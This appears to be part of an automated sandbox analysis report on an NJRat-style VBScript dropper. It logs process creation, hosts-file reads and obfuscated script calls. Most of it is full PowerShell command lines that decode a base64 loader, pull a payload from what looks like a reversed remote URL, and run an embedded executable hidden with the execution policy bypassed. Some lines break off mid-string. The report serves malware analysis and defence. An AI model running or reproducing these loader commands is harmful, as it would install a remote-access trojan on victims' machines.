Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NJratccccassssG2.00.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: e.pdb source: powershell.exe, 00000018.00000003.382609842.000001976081F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.403084712.000001976081F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdbCk source: powershell.exe, 00000018.00000002.403195364.0000019760B80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationlib.pdb/E source: powershell.exe, 00000018.00000003.382609842.000001976081F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.403084712.000001976081F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Hacking\Crypters Modding\ClassLibrary3\ClassLibrary3\obj\Release\lpOUplMp.pdb source: powershell.exe, 00000010.00000002.354455208.000002164DC03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357567873.0000021665E70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: jICudHOL.pdb source: powershell.exe, 00000010.00000002.354839665.000002164DEDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357618096.0000021665FB0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");sjGc = StrReverse(hqWU)NUPN = Replace(hqWU ,TSXl, Ubem)sjGc = StrReverse(hqWU)NUPN = Replace(hqWU ,TSXl, Ubem)NUPN = Replace(hqWU ,TSXl, Ubem)IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwB", "0", "false")
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 